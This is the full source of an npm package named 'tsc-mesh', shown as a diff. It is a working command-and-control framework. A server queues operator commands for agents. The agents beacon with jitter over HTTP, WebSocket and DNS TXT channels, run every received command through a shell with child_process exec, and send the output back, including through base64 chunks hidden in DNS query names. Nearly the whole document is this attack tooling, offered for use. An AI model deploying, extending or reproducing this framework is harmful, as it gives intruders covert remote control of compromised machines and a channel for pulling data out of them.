tsc-mesh 1.0.0

package/bin/tsc-mesh.js

@@ -0,0 +1,222 @@
+#!/usr/bin/env node
+
+const minimist = require('minimist');
+const http = require('http');
+const { C2Server } = require('../src/c2server');
+const { C2Agent } = require('../src/c2agent');
+
+const argv = minimist(process.argv.slice(2));
+const cmd = argv._[0];
+
+function showHelp() {
+  console.log(`
+tsc-mesh - Multi-Protocol C2 Mesh Tool
+
+Usage:
+  tsc-mesh server [--port <port>] [--dns-port <port>]
+    Start C2 server (default port: 8443, DNS port: 5353)
+
+  tsc-mesh agent --server <url> [--id <id>] [--interval <ms>]
+    Start C2 agent connecting to server
+    (default id: random, default interval: 5000ms, jitter: 2000ms)
+
+  tsc-mesh send --server <url> --agent <id> --cmd "<command>"
+    Send a command to an agent
+
+  tsc-mesh status --server <url>
+    Show all registered agents and their status
+
+  tsc-mesh help
+    Show this help message
+`);
+}
+
+async function cmdServer() {
+  const port = argv.port || 8443;
+  const dnsPort = argv['dns-port'] || 5353;
+  const server = new C2Server({ port, dnsPort });
+
+  server.on('agent-connected', (id, channel) => {
+    console.log(`[+] Agent connected: ${id} (via ${channel})`);
+  });
+
+  server.on('agent-disconnected', (id) => {
+    console.log(`[-] Agent disconnected: ${id}`);
+  });
+
+  server.on('heartbeat', (id, channel) => {
+    const status = server.getAgentStatus(id);
+    const pending = status ? status.pendingCommands : 0;
+    console.log(`[heartbeat] ${id} (${channel}) pending: ${pending}`);
+  });
+
+  server.on('command-sent', (id, cmd) => {
+    console.log(`[>] Command queued for ${id}: ${cmd}`);
+  });
+
+  server.on('result', (id, result) => {
+    console.log(`[<] Result from ${id}: exit=${result.exitCode}`);
+    if (result.stdout) console.log(result.stdout);
+    if (result.stderr) console.error(result.stderr);
+  });
+
+  try {
+    await server.start();
+    console.log(`[*] C2 Server listening on port ${port}`);
+    console.log(`[*] DNS Server listening on port ${dnsPort}`);
+    console.log('[*] Press Ctrl+C to stop');
+  } catch (err) {
+    console.error('Failed to start server:', err.message);
+    process.exit(1);
+  }
+
+  process.on('SIGINT', () => {
+    console.log('\n[*] Shutting down...');
+    server.stop();
+    process.exit(0);
+  });
+}
+
+async function cmdAgent() {
+  const serverUrl = argv.server;
+  if (!serverUrl) {
+    console.error('Error: --server is required');
+    process.exit(1);
+  }
+
+  const agent = new C2Agent({
+    server: serverUrl,
+    id: argv.id,
+    interval: argv.interval || 5000,
+    dnsPort: argv['dns-port'] || 5353
+  });
+
+  agent.on('started', (id) => {
+    console.log(`[*] Agent started: ${id}`);
+    console.log(`[*] Connecting to server: ${serverUrl}`);
+  });
+
+  agent.on('connected', (id, channel) => {
+    console.log(`[+] Connected via ${channel}`);
+  });
+
+  agent.on('command-result', (cmd, result) => {
+    console.log(`[*] Executed: ${cmd} (exit: ${result.exitCode})`);
+  });
+
+  agent.start();
+
+  process.on('SIGINT', () => {
+    console.log('\n[*] Shutting down agent...');
+    agent.stop();
+    process.exit(0);
+  });
+}
+
+function cmdSend() {
+  const serverUrl = argv.server;
+  const agentId = argv.agent;
+  const command = argv.cmd;
+
+  if (!serverUrl || !agentId || !command) {
+    console.error('Error: --server, --agent, and --cmd are required');
+    process.exit(1);
+  }
+
+  const parsedUrl = new URL(serverUrl);
+  const postData = JSON.stringify({ agent: agentId, command });
+  const options = {
+    hostname: parsedUrl.hostname,
+    port: parsedUrl.port || 8443,
+    path: '/command',
+    method: 'POST',
+    headers: {
+      'Content-Type': 'application/json',
+      'Content-Length': Buffer.byteLength(postData)
+    }
+  };
+
+  const req = http.request(options, (res) => {
+    let body = '';
+    res.on('data', (chunk) => { body += chunk; });
+    res.on('end', () => {
+      try {
+        const data = JSON.parse(body);
+        console.log(JSON.stringify(data, null, 2));
+      } catch (e) {
+        console.log(body);
+      }
+    });
+  });
+
+  req.on('error', (err) => {
+    console.error('Error sending command:', err.message);
+    process.exit(1);
+  });
+
+  req.write(postData);
+  req.end();
+}
+
+function cmdStatus() {
+  const serverUrl = argv.server;
+  if (!serverUrl) {
+    console.error('Error: --server is required');
+    process.exit(1);
+  }
+
+  const parsedUrl = new URL(serverUrl);
+  const options = {
+    hostname: parsedUrl.hostname,
+    port: parsedUrl.port || 8443,
+    path: '/agents',
+    method: 'GET'
+  };
+
+  const req = http.request(options, (res) => {
+    let body = '';
+    res.on('data', (chunk) => { body += chunk; });
+    res.on('end', () => {
+      try {
+        const data = JSON.parse(body);
+        if (data.agents && data.agents.length === 0) {
+          console.log('No agents registered.');
+        } else if (data.agents) {
+          console.log('Registered agents:');
+          for (const agent of data.agents) {
+            const status = agent.connected ? 'CONNECTED' : 'DISCONNECTED';
+            console.log(`  ${agent.id}`);
+            console.log(`    Channels: ${agent.channels.join(', ') || 'none'}`);
+            console.log(`    Status: ${status}`);
+            console.log(`    Last seen: ${new Date(agent.lastSeen).toISOString()}`);
+          }
+        } else {
+          console.log(JSON.stringify(data, null, 2));
+        }
+      } catch (e) {
+        console.log(body);
+      }
+    });
+  });
+
+  req.on('error', (err) => {
+    console.error('Error fetching status:', err.message);
+    process.exit(1);
+  });
+
+  req.end();
+}
+
+const commands = {
+  server: cmdServer,
+  agent: cmdAgent,
+  send: cmdSend,
+  status: cmdStatus,
+  help: showHelp
+};
+
+if (commands[cmd]) {
+  commands[cmd]();
+} else {
+  showHelp();
+}

package/package.json

@@ -0,0 +1,14 @@
+{
+  "name": "tsc-mesh",
+  "version": "1.0.0",
+  "description": "Multi-Protocol C2 Mesh Tool",
+  "bin": {
+    "tsc-mesh": "bin/tsc-mesh.js"
+  },
+  "dependencies": {
+    "minimist": "1.2.8",
+    "ws": "^8.16.0"
+  },
+  "author": "SURUJ404",
+  "license": "GPL-3.0"
+}

package/src/c2agent.js

@@ -0,0 +1,244 @@
+const http = require('http');
+const url = require('url');
+const { exec } = require('child_process');
+const { WebSocket } = require('ws');
+const { EventEmitter } = require('events');
+const { DNSProtocol } = require('./dnsprotocol');
+
+class C2Agent extends EventEmitter {
+  constructor(options = {}) {
+    super();
+    this.serverUrl = options.server || 'http://localhost:8443';
+    this.agentId = options.id || `agent-${Math.random().toString(36).slice(2, 8)}`;
+    this.beaconInterval = options.interval || 5000;
+    this.jitter = options.jitter || 2000;
+
+    const parsed = url.parse(this.serverUrl);
+    this.serverHost = parsed.hostname || 'localhost';
+    this.serverPort = parseInt(parsed.port, 10) || 8443;
+    this.serverProto = parsed.protocol || 'http:';
+    this.dnsPort = options.dnsPort || 5353;
+
+    this.ws = null;
+    this.dns = null;
+    this.running = false;
+    this.beaconTimer = null;
+
+    this.channelHealth = {
+      http: { ok: true, backoff: 1000, failures: 0 },
+      ws: { ok: true, backoff: 1000, failures: 0 },
+      dns: { ok: true, backoff: 1000, failures: 0 }
+    };
+
+    this.activeChannel = 'http';
+    this.channelOrder = ['http', 'ws', 'dns'];
+  }
+
+  async start() {
+    this.running = true;
+    await this._initDNS();
+    this._connectWebSocket();
+    this._beacon();
+    this.emit('started', this.agentId);
+  }
+
+  _initDNS() {
+    return new Promise((resolve) => {
+      this.dns = new DNSProtocol(0, 'client');
+      this.dns.start(() => resolve());
+    });
+  }
+
+  _connectWebSocket() {
+    const wsUrl = `ws://${this.serverHost}:${this.serverPort}`;
+    try {
+      this.ws = new WebSocket(wsUrl);
+
+      this.ws.on('open', () => {
+        this.channelHealth.ws.ok = true;
+        this.channelHealth.ws.failures = 0;
+        this.channelHealth.ws.backoff = 1000;
+        this.ws.send(JSON.stringify({ type: 'register', id: this.agentId }));
+      });
+
+      this.ws.on('message', (data) => {
+        try {
+          const msg = JSON.parse(data.toString());
+          if (msg.type === 'commands' && msg.commands && msg.commands.length > 0) {
+            this._processCommands(msg.commands, 'ws');
+          }
+          if (msg.type === 'registered') {
+            this.emit('connected', this.agentId, 'ws');
+          }
+        } catch (e) {}
+      });
+
+      this.ws.on('close', () => {
+        this.channelHealth.ws.ok = false;
+        this.channelHealth.ws.failures++;
+        const delay = Math.min(this.channelHealth.ws.backoff * 2, 30000);
+        this.channelHealth.ws.backoff = delay;
+        setTimeout(() => this._connectWebSocket(), delay);
+      });
+
+      this.ws.on('error', () => {
+        this.channelHealth.ws.ok = false;
+        this.channelHealth.ws.failures++;
+        this.ws.close();
+      });
+    } catch (e) {
+      this.channelHealth.ws.ok = false;
+    }
+  }
+
+  _beacon() {
+    if (!this.running) return;
+    this._sendHeartbeat();
+    this._pollCommands();
+    const jitterMs = Math.floor(Math.random() * this.jitter * 2) - this.jitter;
+    const delay = Math.max(1000, this.beaconInterval + jitterMs);
+    this.beaconTimer = setTimeout(() => this._beacon(), delay);
+  }
+
+  _sendHeartbeat() {
+    const channel = this._getActiveChannel();
+    if (channel === 'http') {
+      const postData = JSON.stringify({ id: this.agentId, channel: 'http' });
+      const options = {
+        hostname: this.serverHost,
+        port: this.serverPort,
+        path: '/heartbeat',
+        method: 'POST',
+        headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(postData) }
+      };
+      const req = http.request(options, (res) => {
+        this.channelHealth.http.ok = true;
+        this.channelHealth.http.failures = 0;
+        this.channelHealth.http.backoff = 1000;
+      });
+      req.on('error', () => {
+        this.channelHealth.http.ok = false;
+        this.channelHealth.http.failures++;
+      });
+      req.write(postData);
+      req.end();
+    } else if (channel === 'ws' && this.ws && this.ws.readyState === WebSocket.OPEN) {
+      try {
+        this.ws.send(JSON.stringify({ type: 'heartbeat', id: this.agentId }));
+      } catch (e) {
+        this.channelHealth.ws.ok = false;
+      }
+    } else if (channel === 'dns') {
+      this.dns.sendQuery(this.agentId, this.serverHost, this.dnsPort, (err, answers) => {
+        if (err) {
+          this.channelHealth.dns.ok = false;
+          this.channelHealth.dns.failures++;
+        } else {
+          this.channelHealth.dns.ok = true;
+          this.channelHealth.dns.failures = 0;
+          this.channelHealth.dns.backoff = 1000;
+        }
+      });
+    }
+  }
+
+  _pollCommands() {
+    const channel = this._getActiveChannel();
+    if (channel === 'http') {
+      const options = {
+        hostname: this.serverHost,
+        port: this.serverPort,
+        path: `/poll?id=${encodeURIComponent(this.agentId)}`,
+        method: 'GET'
+      };
+      const req = http.request(options, (res) => {
+        let body = '';
+        res.on('data', (chunk) => { body += chunk; });
+        res.on('end', () => {
+          try {
+            const data = JSON.parse(body);
+            if (data.commands && data.commands.length > 0) {
+              this._processCommands(data.commands, 'http');
+            }
+          } catch (e) {}
+        });
+      });
+      req.on('error', () => {});
+      req.end();
+    } else if (channel === 'ws' && this.ws && this.ws.readyState === WebSocket.OPEN) {
+      try {
+        this.ws.send(JSON.stringify({ type: 'poll', id: this.agentId }));
+      } catch (e) {}
+    } else if (channel === 'dns') {
+      this.dns.sendQuery(this.agentId, this.serverHost, this.dnsPort, (err, answers) => {
+        if (!err && answers.length > 0) {
+          this._processCommands(answers, 'dns');
+        }
+      });
+    }
+  }
+
+  _getActiveChannel() {
+    for (const ch of this.channelOrder) {
+      if (this.channelHealth[ch].ok) return ch;
+    }
+    return this.channelOrder[0];
+  }
+
+  _processCommands(commands, channel) {
+    for (const cmd of commands) {
+      this.executeCommand(cmd, channel);
+    }
+  }
+
+  executeCommand(cmd, incomingChannel) {
+    return new Promise((resolve) => {
+      exec(cmd, { timeout: 30000 }, (error, stdout, stderr) => {
+        const result = {
+          command: cmd,
+          stdout: stdout || '',
+          stderr: stderr || '',
+          exitCode: error ? (error.code || 1) : 0
+        };
+        this._reportResult(result, incomingChannel);
+        this.emit('command-result', cmd, result);
+        resolve(result);
+      });
+    });
+  }
+
+  _reportResult(result, channel) {
+    if (channel === 'http') {
+      const postData = JSON.stringify({ id: this.agentId, result });
+      const options = {
+        hostname: this.serverHost,
+        port: this.serverPort,
+        path: '/result',
+        method: 'POST',
+        headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(postData) }
+      };
+      const req = http.request(options);
+      req.on('error', () => {});
+      req.write(postData);
+      req.end();
+    } else if (channel === 'ws' && this.ws && this.ws.readyState === WebSocket.OPEN) {
+      try {
+        this.ws.send(JSON.stringify({ type: 'result', id: this.agentId, result }));
+      } catch (e) {}
+    } else if (channel === 'dns') {
+      const encoded = Buffer.from(JSON.stringify({ id: this.agentId, result })).toString('base64').replace(/=+$/, '');
+      this.dns.sendResultQuery(this.agentId, encoded, this.serverHost, this.dnsPort);
+    }
+  }
+
+  stop() {
+    this.running = false;
+    if (this.beaconTimer) clearTimeout(this.beaconTimer);
+    if (this.ws) {
+      try { this.ws.close(); } catch (e) {}
+    }
+    if (this.dns) this.dns.stop();
+  }
+}
+
+module.exports = { C2Agent };

package/src/c2server.js

@@ -0,0 +1,267 @@
+const http = require('http');
+const url = require('url');
+const { WebSocketServer } = require('ws');
+const { EventEmitter } = require('events');
+const { DNSProtocol, extractQueryType, extractResultFromQuery } = require('./dnsprotocol');
+
+class C2Server extends EventEmitter {
+  constructor(options = {}) {
+    super();
+    this.httpPort = options.port || 8443;
+    this.dnsPort = options.dnsPort || 5353;
+    this.agents = new Map();
+    this.commandQueue = new Map();
+    this.httpServer = null;
+    this.wss = null;
+    this.dns = null;
+  }
+
+  async start() {
+    return new Promise((resolve, reject) => {
+      this.httpServer = http.createServer((req, res) => {
+        this._handleHTTP(req, res);
+      });
+
+      this.wss = new WebSocketServer({ server: this.httpServer });
+      this.wss.on('connection', (ws, req) => {
+        this._handleWebSocket(ws, req);
+      });
+
+      this.httpServer.listen(this.httpPort, () => {
+        this._startDNS((err) => {
+          if (err) return reject(err);
+          resolve();
+        });
+      });
+
+      this.httpServer.on('error', reject);
+    });
+  }
+
+  _startDNS(callback) {
+    this.dns = new DNSProtocol(this.dnsPort, 'server');
+    this.dns.onQuery((parsed, agentId, rawMsg) => {
+      if (!agentId) return;
+      if (parsed.qtype !== 16) return;
+
+      const qtype = extractQueryType(parsed.qname);
+
+      if (qtype === 'r') {
+        const resultData = extractResultFromQuery(parsed.qname);
+        if (resultData && resultData.id && resultData.result) {
+          this.emit('result', resultData.id, resultData.result);
+        }
+        this.dns.sendResponse(rawMsg, parsed.rinfo, []);
+        return;
+      }
+
+      const pending = this.getPendingCommands(agentId);
+      const answers = [];
+      if (pending.length > 0) {
+        const cmd = pending[0];
+        this.commandQueue.get(agentId).shift();
+        answers.push({ name: parsed.qname, type: 'TXT', data: cmd, ttl: 1 });
+      }
+      this.dns.sendResponse(rawMsg, parsed.rinfo, answers);
+    });
+    this.dns.start(callback);
+  }
+
+  _handleHTTP(req, res) {
+    const parsed = url.parse(req.url, true);
+    const method = req.method.toUpperCase();
+
+    res.setHeader('Access-Control-Allow-Origin', '*');
+    res.setHeader('Access-Control-Allow-Methods', 'GET, POST, OPTIONS');
+    res.setHeader('Access-Control-Allow-Headers', 'Content-Type');
+
+    if (method === 'OPTIONS') {
+      res.writeHead(204);
+      return res.end();
+    }
+
+    if (parsed.pathname === '/poll' && method === 'GET') {
+      const agentId = parsed.query.id;
+      if (!agentId) {
+        res.writeHead(400);
+        return res.end(JSON.stringify({ error: 'Missing agent id' }));
+      }
+      this._registerAgentPoll(agentId, 'http');
+      const commands = this.getPendingCommands(agentId);
+      res.writeHead(200, { 'Content-Type': 'application/json' });
+      return res.end(JSON.stringify({ commands, agentId }));
+    }
+
+    if (parsed.pathname === '/command' && method === 'POST') {
+      let body = '';
+      req.on('data', (chunk) => { body += chunk; });
+      req.on('end', () => {
+        try {
+          const data = JSON.parse(body);
+          if (!data.agent || !data.command) {
+            res.writeHead(400);
+            return res.end(JSON.stringify({ error: 'Missing agent or command' }));
+          }
+          this.sendCommand(data.agent, data.command);
+          res.writeHead(200, { 'Content-Type': 'application/json' });
+          res.end(JSON.stringify({ status: 'queued', agent: data.agent }));
+        } catch (e) {
+          res.writeHead(400);
+          res.end(JSON.stringify({ error: 'Invalid JSON' }));
+        }
+      });
+      return;
+    }
+
+    if (parsed.pathname === '/agents' && method === 'GET') {
+      const list = [];
+      for (const [id, info] of this.agents) {
+        list.push({ id, channels: info.channels, lastSeen: info.lastSeen, connected: info.connected });
+      }
+      res.writeHead(200, { 'Content-Type': 'application/json' });
+      return res.end(JSON.stringify({ agents: list }));
+    }
+
+    if (parsed.pathname === '/heartbeat' && method === 'POST') {
+      let body = '';
+      req.on('data', (chunk) => { body += chunk; });
+      req.on('end', () => {
+        try {
+          const data = JSON.parse(body);
+          if (!data.id) {
+            res.writeHead(400);
+            return res.end(JSON.stringify({ error: 'Missing id' }));
+          }
+          this._registerAgentPoll(data.id, data.channel || 'http');
+          this.emit('heartbeat', data.id, data.channel || 'http');
+          res.writeHead(200, { 'Content-Type': 'application/json' });
+          res.end(JSON.stringify({ status: 'ok' }));
+        } catch (e) {
+          res.writeHead(400);
+          res.end(JSON.stringify({ error: 'Invalid JSON' }));
+        }
+      });
+      return;
+    }
+
+    res.writeHead(404);
+    res.end(JSON.stringify({ error: 'Not found' }));
+  }
+
+  _handleWebSocket(ws, req) {
+    const parsedUrl = url.parse(req.url, true);
+    let agentId = null;
+
+    ws.on('message', (data) => {
+      try {
+        const msg = JSON.parse(data.toString());
+        if (!agentId && msg.type !== 'register') return;
+
+        if (msg.type === 'register') {
+          agentId = msg.id;
+          this.registerAgent(agentId, ['ws']);
+          this.emit('agent-connected', agentId, 'ws');
+          ws.send(JSON.stringify({ type: 'registered', agentId }));
+          return;
+        }
+
+        if (msg.type === 'heartbeat') {
+          if (agentId) {
+            this._registerAgentPoll(agentId, 'ws');
+          }
+          ws.send(JSON.stringify({ type: 'heartbeat-ack' }));
+          return;
+        }
+
+        if (msg.type === 'poll') {
+          if (!agentId) return;
+          this._registerAgentPoll(agentId, 'ws');
+          const commands = this.getPendingCommands(agentId);
+          ws.send(JSON.stringify({ type: 'commands', commands }));
+          return;
+        }
+
+        if (msg.type === 'result') {
+          if (agentId) {
+            this.emit('result', agentId, msg.result, msg.channel);
+          }
+          return;
+        }
+      } catch (e) {}
+    });
+
+    ws.on('close', () => {
+      if (agentId) {
+        const agent = this.agents.get(agentId);
+        if (agent) agent.connected = false;
+        this.emit('agent-disconnected', agentId);
+      }
+    });
+
+    ws.on('error', () => {});
+  }
+
+  registerAgent(id, channels) {
+    if (!this.agents.has(id)) {
+      this.agents.set(id, {
+        channels: [],
+        lastSeen: Date.now(),
+        connected: true
+      });
+    }
+    const agent = this.agents.get(id);
+    for (const ch of channels) {
+      if (!agent.channels.includes(ch)) {
+        agent.channels.push(ch);
+      }
+    }
+    agent.lastSeen = Date.now();
+    agent.connected = true;
+
+    if (!this.commandQueue.has(id)) {
+      this.commandQueue.set(id, []);
+    }
+  }
+
+  _registerAgentPoll(id, channel) {
+    this.registerAgent(id, [channel]);
+    const agent = this.agents.get(id);
+    if (agent) {
+      agent.lastSeen = Date.now();
+      agent.connected = true;
+    }
+  }
+
+  sendCommand(agentId, command) {
+    if (!this.commandQueue.has(agentId)) {
+      this.commandQueue.set(agentId, []);
+    }
+    this.commandQueue.get(agentId).push(command);
+    this.emit('command-sent', agentId, command);
+  }
+
+  getPendingCommands(agentId) {
+    if (!this.commandQueue.has(agentId)) return [];
+    return [...this.commandQueue.get(agentId)];
+  }
+
+  getAgentStatus(agentId) {
+    const agent = this.agents.get(agentId);
+    if (!agent) return null;
+    return {
+      id: agentId,
+      channels: agent.channels,
+      lastSeen: agent.lastSeen,
+      connected: agent.connected,
+      pendingCommands: this.commandQueue.get(agentId)?.length || 0
+    };
+  }
+
+  stop() {
+    if (this.wss) this.wss.close();
+    if (this.dns) this.dns.stop();
+    if (this.httpServer) this.httpServer.close();
+  }
+}
+
+module.exports = { C2Server };

package/src/dnsprotocol.js

@@ -0,0 +1,275 @@
+const dgram = require('dgram');
+
+const DNS_C2_DOMAIN = '.c2.tsc';
+
+function encodeDNSName(name) {
+  const parts = name.split('.');
+  const buf = Buffer.alloc(256);
+  let offset = 0;
+  for (const part of parts) {
+    if (part.length === 0) continue;
+    buf[offset++] = part.length;
+    buf.write(part, offset);
+    offset += part.length;
+  }
+  buf[offset++] = 0;
+  return buf.slice(0, offset);
+}
+
+function decodeDNSName(buf, offset) {
+  let labels = [];
+  let jumped = false;
+  let jumps = 0;
+  let origOffset = offset;
+  while (true) {
+    const len = buf[offset];
+    if (len === 0) {
+      offset++;
+      break;
+    }
+    if ((len & 0xc0) === 0xc0) {
+      if (!jumped) {
+        origOffset = offset + 2;
+      }
+      offset = ((len & 0x3f) << 8) | buf[offset + 1];
+      jumped = true;
+      jumps++;
+      if (jumps > 10) break;
+      continue;
+    }
+    offset++;
+    labels.push(buf.toString('ascii', offset, offset + len));
+    offset += len;
+  }
+  if (!jumped) {
+    return { name: labels.join('.'), newOffset: offset };
+  }
+  return { name: labels.join('.'), newOffset: origOffset };
+}
+
+function buildDNSResponse(query, answers) {
+  const header = Buffer.alloc(12);
+  query.copy(header, 0, 0, 2);
+  header.writeUInt16BE(0x8180, 2);
+  header.writeUInt16BE(1, 4);
+  header.writeUInt16BE(answers.length, 6);
+  header.writeUInt16BE(0, 8);
+  header.writeUInt16BE(0, 10);
+
+  const question = query.slice(12, findEndOfQuestion(query, 12));
+  const chunks = [header, question];
+
+  for (const answer of answers) {
+    const nameEncoded = encodeDNSName(answer.name);
+    const rdlen = answer.data.length;
+    const rec = Buffer.alloc(nameEncoded.length + 10 + rdlen);
+    let off = 0;
+    nameEncoded.copy(rec, off); off += nameEncoded.length;
+    rec.writeUInt16BE(answer.type === 'TXT' ? 16 : 1, off); off += 2;
+    rec.writeUInt16BE(1, off); off += 2;
+    rec.writeUInt32BE(answer.ttl || 60, off); off += 4;
+    if (answer.type === 'TXT') {
+      const txtData = Buffer.from(answer.data, 'utf8');
+      rec.writeUInt16BE(txtData.length + 1, off); off += 2;
+      rec[off++] = txtData.length;
+      txtData.copy(rec, off);
+    } else {
+      const ip = answer.data.split('.').map(Number);
+      rec.writeUInt16BE(4, off); off += 2;
+      for (const octet of ip) rec[off++] = octet;
+    }
+    chunks.push(rec);
+  }
+
+  return Buffer.concat(chunks);
+}
+
+function findEndOfQuestion(buf, start) {
+  let off = start;
+  while (true) {
+    if (off >= buf.length) return off;
+    const len = buf[off];
+    if (len === 0) return off + 5;
+    if ((len & 0xc0) === 0xc0) return off + 2;
+    off += len + 1;
+  }
+}
+
+function parseDNSQuery(msg, rinfo) {
+  if (msg.length < 12) return null;
+  const id = msg.readUInt16BE(0);
+  const flags = msg.readUInt16BE(2);
+  const qdcount = msg.readUInt16BE(4);
+
+  if ((flags & 0x7800) !== 0 || qdcount === 0) return null;
+
+  const { name: qname, newOffset } = decodeDNSName(msg, 12);
+  if (!qname) return null;
+  const qtype = msg.readUInt16BE(newOffset);
+  const qclass = msg.readUInt16BE(newOffset + 2);
+
+  return { id, qname, qtype, qclass, rinfo };
+}
+
+function extractAgentIdFromQuery(qname) {
+  const lower = qname.toLowerCase();
+  if (!lower.endsWith(DNS_C2_DOMAIN)) return null;
+  const subdomain = lower.slice(0, -DNS_C2_DOMAIN.length);
+  if (!subdomain || subdomain.endsWith('.')) return null;
+  const parts = subdomain.split('.');
+  return parts[0];
+}
+
+function extractQueryType(qname) {
+  const lower = qname.toLowerCase();
+  if (!lower.endsWith(DNS_C2_DOMAIN)) return null;
+  const subdomain = lower.slice(0, -DNS_C2_DOMAIN.length);
+  if (!subdomain) return null;
+  const parts = subdomain.split('.');
+  return parts[1] || null;
+}
+
+function extractResultFromQuery(qname) {
+  const lower = qname.toLowerCase();
+  if (!lower.endsWith(DNS_C2_DOMAIN)) return null;
+  const subdomain = lower.slice(0, -DNS_C2_DOMAIN.length);
+  if (!subdomain) return null;
+  const parts = subdomain.split('.');
+  if (parts.length < 3 || parts[1] !== 'r') return null;
+  const encoded = parts.slice(2).join('');
+  try {
+    return JSON.parse(Buffer.from(encoded, 'base64').toString('utf8'));
+  } catch (e) {
+    return null;
+  }
+}
+
+function buildDNSQuery(agentId, queryType = 'poll', extra = null) {
+  const id = Math.floor(Math.random() * 65535);
+  const flags = 0x0100;
+  const qdcount = 1;
+  const header = Buffer.alloc(12);
+  header.writeUInt16BE(id, 0);
+  header.writeUInt16BE(flags, 2);
+  header.writeUInt16BE(qdcount, 4);
+  header.writeUInt16BE(0, 6);
+  header.writeUInt16BE(0, 8);
+  header.writeUInt16BE(0, 10);
+
+  const MAX_LABEL = 63;
+  let domain;
+  if (extra) {
+    const dataParts = [];
+    for (let i = 0; i < extra.length; i += MAX_LABEL) {
+      dataParts.push(extra.slice(i, i + MAX_LABEL));
+    }
+    domain = `${agentId}.${queryType}.${dataParts.join('.')}.c2.tsc`;
+  } else {
+    domain = `${agentId}.${queryType}.c2.tsc`;
+  }
+
+  const encoded = encodeDNSName(domain);
+  const qtype = Buffer.alloc(2);
+  qtype.writeUInt16BE(16, 0);
+  const qclass = Buffer.alloc(2);
+  qclass.writeUInt16BE(1, 0);
+
+  return { id, packet: Buffer.concat([header, encoded, qtype, qclass]) };
+}
+
+function parseDNSResponse(msg, expectedId) {
+  if (msg.length < 12) return [];
+  const id = msg.readUInt16BE(0);
+  if (id !== expectedId) return [];
+  const flags = msg.readUInt16BE(2);
+  if ((flags & 0x8000) === 0) return [];
+  const ancount = msg.readUInt16BE(6);
+  if (ancount === 0) return [];
+
+  const answers = [];
+  let offset = 12;
+  const { newOffset } = decodeDNSName(msg, offset);
+  offset = newOffset + 4;
+
+  for (let i = 0; i < ancount; i++) {
+    const { newOffset: nameEnd } = decodeDNSName(msg, offset);
+    offset = nameEnd;
+    const type = msg.readUInt16BE(offset); offset += 2;
+    offset += 2;
+    offset += 4;
+    const rdlength = msg.readUInt16BE(offset); offset += 2;
+    if (type === 16) {
+      const txtLen = msg[offset]; offset++;
+      const txt = msg.toString('utf8', offset, offset + txtLen);
+      answers.push(txt);
+      offset += rdlength - 1;
+    } else {
+      offset += rdlength;
+    }
+  }
+  return answers;
+}
+
+class DNSProtocol {
+  constructor(port, mode = 'server') {
+    this.port = port;
+    this.mode = mode;
+    this.socket = null;
+    this.handlers = [];
+  }
+
+  start(callback) {
+    this.socket = dgram.createSocket({ type: 'udp4' });
+    this.socket.on('message', (msg, rinfo) => {
+      const parsed = parseDNSQuery(msg, rinfo);
+      if (!parsed) return;
+      const agentId = extractAgentIdFromQuery(parsed.qname);
+      for (const handler of this.handlers) {
+        handler(parsed, agentId, msg);
+      }
+    });
+    this.socket.on('error', (err) => {
+      if (callback) callback(err);
+    });
+    this.socket.bind(this.port, () => {
+      if (callback) callback(null);
+    });
+  }
+
+  onQuery(handler) {
+    this.handlers.push(handler);
+  }
+
+  sendResponse(queryMsg, rinfo, answers) {
+    const response = buildDNSResponse(queryMsg, answers);
+    this.socket.send(response, 0, response.length, rinfo.port, rinfo.address);
+  }
+
+  sendQuery(agentId, serverAddr, serverPort, callback) {
+    const { id, packet } = buildDNSQuery(agentId);
+    const timeout = setTimeout(() => {
+      if (callback) callback(new Error('DNS query timeout'), []);
+    }, 5000);
+
+    this.socket.once('message', (msg) => {
+      clearTimeout(timeout);
+      const answers = parseDNSResponse(msg, id);
+      if (callback) callback(null, answers);
+    });
+
+    this.socket.send(packet, 0, packet.length, serverPort, serverAddr);
+  }
+
+  sendResultQuery(agentId, encodedData, serverAddr, serverPort) {
+    const { packet } = buildDNSQuery(agentId, 'r', encodedData);
+    this.socket.send(packet, 0, packet.length, serverPort, serverAddr);
+  }
+
+  stop() {
+    if (this.socket) {
+      try { this.socket.close(); } catch (e) {}
+    }
+  }
+}
+
+module.exports = { DNSProtocol, extractAgentIdFromQuery, extractQueryType, extractResultFromQuery };